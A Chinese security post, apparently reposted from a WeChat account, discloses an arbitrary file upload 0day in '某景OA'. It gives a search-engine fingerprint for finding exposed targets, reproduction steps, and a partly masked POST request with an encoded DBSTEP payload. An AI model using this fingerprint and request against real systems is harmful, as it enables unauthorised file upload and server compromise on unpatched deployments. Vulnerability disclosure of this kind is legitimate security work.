鹰图指纹:
web.body="/images/hcm/themes/"
web.icon=="435b5d431ded7d0776dfa621c9c63385"
某景OA接口存在任意文件上传漏洞
利用条件:访问正确接口、配合正确请求头
利用难度:低
漏洞路径:
/w_selfservice/xxxxxxxx/xxxxxx/xxxxxxx/system/xxxxxx/customreport/xxxxxxx.jsp
复现过程:
post请求访问接口:
/w_selfservice/xxxxxxxx/xxxxxx/xxxxxxx/system/xxxxxx/customreport/xxxxxxx.jsp 进行任意文件上传
FILETYPE参数为文件上传的路径 (可以自定义 将文件上传的路径及文件名进行base64编码即可):
可以看到 实现任意文件上传:
零日/一日 漏洞探讨加 Xud330327
模糊数据包:POST /w_selfservice/xxxxxxxx/xxxxxx/xxxxxxx/system/xxxxxx/customreport/xxxxxxx.jsp HTTP/1.1Host: xxxxxxxxCookie: JSESSIONID=xxxxxxxxxxxxxxxxxxxxxxxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeContent-Length: xxxDBSTEP V3.0 351 0 666 DBSTEP=REJTVEVQxxxxxxxx=xxxxxxxxxxxxxxxx=zUCTxxxxziCAPLesw4gxxxxwV66xxxxxxxx=Li5cxxxxanNwxxxxxxxx=qLSGxxxxzLeGxxxxxUoXwid6xxxxxxxx=wV66xoxxxxxxxx=xxxxxxxxxxxxxxxxx=qfTdqfTdqfTdVaxJeAJxxxxxxaxsdGhiyYlTcATdN1xxxxxXwiVGzfT2dEg6xxxxxxxx=yRWxxxxS6xxxxxxxx=xxxxxxxx=iz=66wiki 凯撒sec
原文始发于微信公众号(凯撒安全实验室):某景OA 任意文件上传(0day)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论